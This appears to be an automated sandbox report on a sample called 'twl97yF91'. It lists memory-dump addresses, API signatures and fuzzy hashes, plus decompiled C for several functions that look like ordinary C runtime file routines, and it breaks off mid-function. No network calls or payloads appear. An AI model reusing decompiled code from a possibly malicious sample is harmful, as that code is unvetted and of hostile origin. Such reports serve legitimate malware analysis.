                                                                                                                                                                                                          0x0040c8be
                                                                                                                                                                                                          0x0040c8a1
                                                                                                                                                                                                          0x0040c8a1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c8a1
                                                                                                                                                                                                          0x0040c86d
                                                                                                                                                                                                          0x0040c873
                                                                                                                                                                                                          0x0040c880
                                                                                                                                                                                                          0x0040c880
                                                                                                                                                                                                          0x0040c882
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c877
                                                                                                                                                                                                          0x0040c87a
                                                                                                                                                                                                          0x0040c87c
                                                                                                                                                                                                          0x0040c87c
                                                                                                                                                                                                          0x0040c87c
                                                                                                                                                                                                          0x0040c87c
                                                                                                                                                                                                          0x0040c87f
                                                                                                                                                                                                          0x0040c87f
                                                                                                                                                                                                          0x0040c87f
                                                                                                                                                                                                          0x0040c884
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c884
                                                                                                                                                                                                          0x0040c82b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c82b
                                                                                                                                                                                                          0x0040c7fe
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c7fe
                                                                                                                                                                                                          0x0040c80a
                                                                                                                                                                                                          0x0040c80f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c80f
                                                                                                                                                                                                          0x0040c7ce
                                                                                                                                                                                                          0x0040c7d8
                                                                                                                                                                                                          0x0040c7db
                                                                                                                                                                                                          0x0040c7e0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c7e2
                                                                                                                                                                                                          0x0040c7e4
                                                                                                                                                                                                          0x0040c7e6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c7e8
                                                                                                                                                                                                          0x0040c7ea
                                                                                                                                                                                                          0x0040c7ea
                                                                                                                                                                                                          0x0040c7ed
                                                                                                                                                                                                          0x0040c7ef
                                                                                                                                                                                                          0x0040c7f2
                                                                                                                                                                                                          0x0040c7f2
                                                                                                                                                                                                          0x0040c7f2
                                                                                                                                                                                                          0x0040c7f4
                                                                                                                                                                                                          0x0040c7f5
                                                                                                                                                                                                          0x0040c7f5
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                                                                                          • __locking.LIBCMT ref: 0040C791
                                                                                                                                                                                                            • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                            • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2395185920-0
                                                                                                                                                                                                          • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                          • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _fseek_malloc_memset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 208892515-0
                                                                                                                                                                                                          • Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                                                                                                                                                                          • Instruction ID: 2e24b71a3686789743fa28f5375901659d2b540135881608da43852a023a1963
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E441C772600B114AD732863EF904797B3EAEFC0358F240A2DE996827D0E771E545CB95
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1291973410-0
                                                                                                                                                                                                          • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                          • Instruction ID: 466754a198f17fa106bca301e87fc8bc85fda25ca3c3beb12df5f5021220c674
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5041B031A00688AFDB269F6988805EEF7B6EFC0728F248629EC5597154E774DE40CB40
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                                                          			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t30;
                                                                                                                                                                                                          				signed int _t31;
                                                                                                                                                                                                          				signed int _t32;
                                                                                                                                                                                                          				signed int _t33;
                                                                                                                                                                                                          				signed int _t35;
                                                                                                                                                                                                          				signed int _t39;
                                                                                                                                                                                                          				void* _t42;
                                                                                                                                                                                                          				intOrPtr _t43;
                                                                                                                                                                                                          				void* _t45;
                                                                                                                                                                                                          				signed int _t48;
                                                                                                                                                                                                          				signed int* _t53;
                                                                                                                                                                                                          				void* _t54;
                                                                                                                                                                                                          				void* _t55;
                                                                                                                                                                                                          				void* _t57;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t54 = __ebp;
                                                                                                                                                                                                          				_t45 = __edx;
                                                                                                                                                                                                          				_t42 = __ebx;
                                                                                                                                                                                                          				_t53 = _a4;
                                                                                                                                                                                                          				if(_t53 == 0) {
                                                                                                                                                                                                          					L40:
                                                                                                                                                                                                          					_t31 = _t30 | 0xffffffff;
                                                                                                                                                                                                          					__eflags = _t31;
                                                                                                                                                                                                          					return _t31;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t43 = _a12;
                                                                                                                                                                                                          					if(_t43 == 2) {
                                                                                                                                                                                                          						goto L40;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t30 = _t53[0xe];
                                                                                                                                                                                                          						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
                                                                                                                                                                                                          							goto L40;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t48 = _a8;
                                                                                                                                                                                                          							if(_t53[0x17] != 0x77) {
                                                                                                                                                                                                          								__eflags = _t43 - 1;
                                                                                                                                                                                                          								if(_t43 == 1) {
                                                                                                                                                                                                          									_t48 = _t48 + _t53[0x1a];
                                                                                                                                                                                                          									__eflags = _t48;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								__eflags = _t48;
                                                                                                                                                                                                          								if(_t48 < 0) {
                                                                                                                                                                                                          									goto L39;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									__eflags = _t53[0x16];
                                                                                                                                                                                                          									if(__eflags == 0) {
                                                                                                                                                                                                          										_t33 = _t53[0x1a];
                                                                                                                                                                                                          										__eflags = _t48 - _t33;
                                                                                                                                                                                                          										if(_t48 < _t33) {
                                                                                                                                                                                                          											_t30 = E004054F0(_t42, _t54, _t53);
                                                                                                                                                                                                          											_t55 = _t55 + 4;
                                                                                                                                                                                                          											__eflags = _t30;
                                                                                                                                                                                                          											if(_t30 < 0) {
                                                                                                                                                                                                          												goto L39;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												goto L27;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											_t48 = _t48 - _t33;
                                                                                                                                                                                                          											L27:
                                                                                                                                                                                                          											__eflags = _t48;
                                                                                                                                                                                                          											if(_t48 == 0) {
                                                                                                                                                                                                          												L38:
                                                                                                                                                                                                          												return _t53[0x1a];
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												__eflags = _t53[0x12];
                                                                                                                                                                                                          												if(_t53[0x12] != 0) {
                                                                                                                                                                                                          													L30:
                                                                                                                                                                                                          													__eflags = _t53[0x1b] - 0xffffffff;
                                                                                                                                                                                                          													if(_t53[0x1b] != 0xffffffff) {
                                                                                                                                                                                                          														_t53[0x1a] = _t53[0x1a] + 1;
                                                                                                                                                                                                          														_t48 = _t48 - 1;
                                                                                                                                                                                                          														__eflags = _t53[0x1c];
                                                                                                                                                                                                          														_t53[0x1b] = 0xffffffff;
                                                                                                                                                                                                          														if(_t53[0x1c] != 0) {
                                                                                                                                                                                                          															_t53[0xe] = 1;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													__eflags = _t48;
                                                                                                                                                                                                          													if(_t48 <= 0) {
                                                                                                                                                                                                          														goto L38;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														while(1) {
                                                                                                                                                                                                          															_t35 = 0x4000;
                                                                                                                                                                                                          															__eflags = _t48 - 0x4000;
                                                                                                                                                                                                          															if(_t48 < 0x4000) {
                                                                                                                                                                                                          																_t35 = _t48;
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
                                                                                                                                                                                                          															_t55 = _t55 + 0xc;
                                                                                                                                                                                                          															__eflags = _t30;
                                                                                                                                                                                                          															if(_t30 <= 0) {
                                                                                                                                                                                                          																goto L39;
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          															_t48 = _t48 - _t30;
                                                                                                                                                                                                          															__eflags = _t48;
                                                                                                                                                                                                          															if(_t48 > 0) {
                                                                                                                                                                                                          																continue;
                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                          																goto L38;
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          															goto L41;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														goto L39;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                                                                                                                                                          													_t55 = _t55 + 4;
                                                                                                                                                                                                          													_t53[0x12] = _t30;
                                                                                                                                                                                                          													__eflags = _t30;
                                                                                                                                                                                                          													if(_t30 == 0) {
                                                                                                                                                                                                          														goto L39;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														goto L30;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_push(0);
                                                                                                                                                                                                          										_push(_t48);
                                                                                                                                                                                                          										_push(_t53[0x10]);
                                                                                                                                                                                                          										_t53[0x1b] = 0xffffffff;
                                                                                                                                                                                                          										_t53[1] = 0;
                                                                                                                                                                                                          										 *_t53 = _t53[0x11];
                                                                                                                                                                                                          										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
                                                                                                                                                                                                          										__eflags = _t30;
                                                                                                                                                                                                          										if(_t30 < 0) {
                                                                                                                                                                                                          											goto L39;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											_t53[0x1a] = _t48;
                                                                                                                                                                                                          											_t53[0x19] = _t48;
                                                                                                                                                                                                          											return _t48;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								if(_t43 == 0) {
                                                                                                                                                                                                          									_t48 = _t48 - _t53[0x19];
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								if(_t48 < 0) {
                                                                                                                                                                                                          									L39:
                                                                                                                                                                                                          									_t32 = _t30 | 0xffffffff;
                                                                                                                                                                                                          									__eflags = _t32;
                                                                                                                                                                                                          									return _t32;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									if(_t53[0x11] != 0) {
                                                                                                                                                                                                          										L11:
                                                                                                                                                                                                          										if(_t48 <= 0) {
                                                                                                                                                                                                          											L17:
                                                                                                                                                                                                          											return _t53[0x19];
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											while(1) {
                                                                                                                                                                                                          												_t39 = 0x4000;
                                                                                                                                                                                                          												if(_t48 < 0x4000) {
                                                                                                                                                                                                          													_t39 = _t48;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
                                                                                                                                                                                                          												_t55 = _t55 + 0xc;
                                                                                                                                                                                                          												if(_t30 == 0) {
                                                                                                                                                                                                          													goto L39;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t48 = _t48 - _t30;
                                                                                                                                                                                                          												if(_t48 > 0) {
                                                                                                                                                                                                          													continue;
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													goto L17;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												goto L41;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											goto L39;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                                                                                                                                                          										_t57 = _t55 + 4;
                                                                                                                                                                                                          										_t53[0x11] = _t30;
                                                                                                                                                                                                          										if(_t30 == 0) {
                                                                                                                                                                                                          											goto L39;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											E0040BA30(_t48, _t30, 0, 0x4000);
                                                                                                                                                                                                          											_t55 = _t57 + 0xc;
                                                                                                                                                                                                          											goto L11;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				L41:
                                                                                                                                                                                                          			}



















                                                                                                                                                                                                          0x00405e0e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405dff
                                                                                                                                                                                                          0x00405dff
                                                                                                                                                                                                          0x00405e10
                                                                                                                                                                                                          0x00405e10
                                                                                                                                                                                                          0x00405e12
                                                                                                                                                                                                          0x00405e73
                                                                                                                                                                                                          0x00405e78
                                                                                                                                                                                                          0x00405e14
                                                                                                                                                                                                          0x00405e14
                                                                                                                                                                                                          0x00405e18
                                                                                                                                                                                                          0x00405e2e
                                                                                                                                                                                                          0x00405e2e
                                                                                                                                                                                                          0x00405e32
                                                                                                                                                                                                          0x00405e34
                                                                                                                                                                                                          0x00405e37
                                                                                                                                                                                                          0x00405e38
                                                                                                                                                                                                          0x00405e3c
                                                                                                                                                                                                          0x00405e43
                                                                                                                                                                                                          0x00405e45
                                                                                                                                                                                                          0x00405e45
                                                                                                                                                                                                          0x00405e43
                                                                                                                                                                                                          0x00405e4c
                                                                                                                                                                                                          0x00405e4e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405e50
                                                                                                                                                                                                          0x00405e50
                                                                                                                                                                                                          0x00405e50
                                                                                                                                                                                                          0x00405e55
                                                                                                                                                                                                          0x00405e57
                                                                                                                                                                                                          0x00405e59
                                                                                                                                                                                                          0x00405e59
                                                                                                                                                                                                          0x00405e61
                                                                                                                                                                                                          0x00405e66
                                                                                                                                                                                                          0x00405e69
                                                                                                                                                                                                          0x00405e6b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405e6d
                                                                                                                                                                                                          0x00405e6f
                                                                                                                                                                                                          0x00405e71
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405e71
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405e50
                                                                                                                                                                                                          0x00405e1a
                                                                                                                                                                                                          0x00405e1f
                                                                                                                                                                                                          0x00405e24
                                                                                                                                                                                                          0x00405e27
                                                                                                                                                                                                          0x00405e2a
                                                                                                                                                                                                          0x00405e2c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405e2c
                                                                                                                                                                                                          0x00405e18
                                                                                                                                                                                                          0x00405e12
                                                                                                                                                                                                          0x00405dc3
                                                                                                                                                                                                          0x00405dc9
                                                                                                                                                                                                          0x00405dcb
                                                                                                                                                                                                          0x00405dcc
                                                                                                                                                                                                          0x00405dcd
                                                                                                                                                                                                          0x00405dd4
                                                                                                                                                                                                          0x00405ddb
                                                                                                                                                                                                          0x00405ddd
                                                                                                                                                                                                          0x00405de5
                                                                                                                                                                                                          0x00405de7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405ded
                                                                                                                                                                                                          0x00405ded
                                                                                                                                                                                                          0x00405df0
                                                                                                                                                                                                          0x00405df7
                                                                                                                                                                                                          0x00405df7
                                                                                                                                                                                                          0x00405de7
                                                                                                                                                                                                          0x00405dc1
                                                                                                                                                                                                          0x00405d3a
                                                                                                                                                                                                          0x00405d3c
                                                                                                                                                                                                          0x00405d3e
                                                                                                                                                                                                          0x00405d3e
                                                                                                                                                                                                          0x00405d43
                                                                                                                                                                                                          0x00405e79
                                                                                                                                                                                                          0x00405e7a
                                                                                                                                                                                                          0x00405e7a
                                                                                                                                                                                                          0x00405e7e
                                                                                                                                                                                                          0x00405d49
                                                                                                                                                                                                          0x00405d4d
                                                                                                                                                                                                          0x00405d77
                                                                                                                                                                                                          0x00405d79
                                                                                                                                                                                                          0x00405da7
                                                                                                                                                                                                          0x00405dac
                                                                                                                                                                                                          0x00405d7b
                                                                                                                                                                                                          0x00405d80
                                                                                                                                                                                                          0x00405d80
                                                                                                                                                                                                          0x00405d87
                                                                                                                                                                                                          0x00405d89
                                                                                                                                                                                                          0x00405d89
                                                                                                                                                                                                          0x00405d91
                                                                                                                                                                                                          0x00405d96
                                                                                                                                                                                                          0x00405d9b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405da1
                                                                                                                                                                                                          0x00405da5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405da5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405d80
                                                                                                                                                                                                          0x00405d4f
                                                                                                                                                                                                          0x00405d54
                                                                                                                                                                                                          0x00405d59
                                                                                                                                                                                                          0x00405d5c
                                                                                                                                                                                                          0x00405d61
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405d67
                                                                                                                                                                                                          0x00405d6f
                                                                                                                                                                                                          0x00405d74
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405d74
                                                                                                                                                                                                          0x00405d61
                                                                                                                                                                                                          0x00405d4d
                                                                                                                                                                                                          0x00405d43
                                                                                                                                                                                                          0x00405d38
                                                                                                                                                                                                          0x00405d20
                                                                                                                                                                                                          0x00405d14
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _fseek_malloc_memset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 208892515-0
                                                                                                                                                                                                          • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                                                                          • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                          			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                          				signed int _t59;
                                                                                                                                                                                                          				intOrPtr* _t61;
                                                                                                                                                                                                          				signed int _t63;
                                                                                                                                                                                                          				void* _t68;
                                                                                                                                                                                                          				signed int _t69;
                                                                                                                                                                                                          				signed int _t72;
                                                                                                                                                                                                          				signed int _t74;
                                                                                                                                                                                                          				signed int _t75;
                                                                                                                                                                                                          				signed int _t77;
                                                                                                                                                                                                          				signed int _t78;
                                                                                                                                                                                                          				signed int _t81;
                                                                                                                                                                                                          				signed int _t82;
                                                                                                                                                                                                          				signed int _t84;
                                                                                                                                                                                                          				signed int _t88;
                                                                                                                                                                                                          				signed int _t97;
                                                                                                                                                                                                          				signed int _t98;
                                                                                                                                                                                                          				signed int _t99;
                                                                                                                                                                                                          				intOrPtr* _t100;
                                                                                                                                                                                                          				void* _t101;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t90 = __edx;
                                                                                                                                                                                                          				if(_a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t100 = _a16;
                                                                                                                                                                                                          					_t105 = _t100;
                                                                                                                                                                                                          					if(_t100 != 0) {
                                                                                                                                                                                                          						_t82 = _a4;
                                                                                                                                                                                                          						__eflags = _t82;
                                                                                                                                                                                                          						if(__eflags == 0) {
                                                                                                                                                                                                          							goto L3;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t63 = _t59 | 0xffffffff;
                                                                                                                                                                                                          						_t90 = _t63 % _a8;
                                                                                                                                                                                                          						__eflags = _a12 - _t63 / _a8;
                                                                                                                                                                                                          						if(__eflags > 0) {
                                                                                                                                                                                                          							goto L3;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t97 = _a8 * _a12;
                                                                                                                                                                                                          						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                                                                                                                                                                                                          						_v8 = _t82;
                                                                                                                                                                                                          						_v16 = _t97;
                                                                                                                                                                                                          						_t81 = _t97;
                                                                                                                                                                                                          						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                                                                          							_v12 = 0x1000;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_v12 =  *(_t100 + 0x18);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _t97;
                                                                                                                                                                                                          						if(_t97 == 0) {
                                                                                                                                                                                                          							L32:
                                                                                                                                                                                                          							return _a12;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							do {
                                                                                                                                                                                                          								_t84 =  *(_t100 + 0xc) & 0x00000108;
                                                                                                                                                                                                          								__eflags = _t84;
                                                                                                                                                                                                          								if(_t84 == 0) {
                                                                                                                                                                                                          									L18:
                                                                                                                                                                                                          									__eflags = _t81 - _v12;
                                                                                                                                                                                                          									if(_t81 < _v12) {
                                                                                                                                                                                                          										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
                                                                                                                                                                                                          										__eflags = _t68 - 0xffffffff;
                                                                                                                                                                                                          										if(_t68 == 0xffffffff) {
                                                                                                                                                                                                          											L34:
                                                                                                                                                                                                          											_t69 = _t97;
                                                                                                                                                                                                          											L35:
                                                                                                                                                                                                          											return (_t69 - _t81) / _a8;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_v8 = _v8 + 1;
                                                                                                                                                                                                          										_t72 =  *(_t100 + 0x18);
                                                                                                                                                                                                          										_t81 = _t81 - 1;
                                                                                                                                                                                                          										_v12 = _t72;
                                                                                                                                                                                                          										__eflags = _t72;
                                                                                                                                                                                                          										if(_t72 <= 0) {
                                                                                                                                                                                                          											_v12 = 1;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										goto L31;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									__eflags = _t84;
                                                                                                                                                                                                          									if(_t84 == 0) {
                                                                                                                                                                                                          										L21:
                                                                                                                                                                                                          										__eflags = _v12;
                                                                                                                                                                                                          										_t98 = _t81;
                                                                                                                                                                                                          										if(_v12 != 0) {
                                                                                                                                                                                                          											_t75 = _t81;
                                                                                                                                                                                                          											_t90 = _t75 % _v12;
                                                                                                                                                                                                          											_t98 = _t98 - _t75 % _v12;
                                                                                                                                                                                                          											__eflags = _t98;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_push(_t98);
                                                                                                                                                                                                          										_push(_v8);
                                                                                                                                                                                                          										_push(E0040FA20(_t90, _t98, _t100));
                                                                                                                                                                                                          										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
                                                                                                                                                                                                          										_t101 = _t101 + 0xc;
                                                                                                                                                                                                          										__eflags = _t74 - 0xffffffff;
                                                                                                                                                                                                          										if(_t74 == 0xffffffff) {
                                                                                                                                                                                                          											L36:
                                                                                                                                                                                                          											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                                                                                                                                                                                                          											_t69 = _v16;
                                                                                                                                                                                                          											goto L35;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											_t88 = _t98;
                                                                                                                                                                                                          											__eflags = _t74 - _t98;
                                                                                                                                                                                                          											if(_t74 <= _t98) {
                                                                                                                                                                                                          												_t88 = _t74;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_v8 = _v8 + _t88;
                                                                                                                                                                                                          											_t81 = _t81 - _t88;
                                                                                                                                                                                                          											__eflags = _t74 - _t98;
                                                                                                                                                                                                          											if(_t74 < _t98) {
                                                                                                                                                                                                          												goto L36;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												L27:
                                                                                                                                                                                                          												_t97 = _v16;
                                                                                                                                                                                                          												goto L31;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t77 = E0040C1FB(_t100);
                                                                                                                                                                                                          									__eflags = _t77;
                                                                                                                                                                                                          									if(_t77 != 0) {
                                                                                                                                                                                                          										goto L34;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									goto L21;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t78 =  *(_t100 + 4);
                                                                                                                                                                                                          								__eflags = _t78;
                                                                                                                                                                                                          								if(__eflags == 0) {
                                                                                                                                                                                                          									goto L18;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								if(__eflags < 0) {
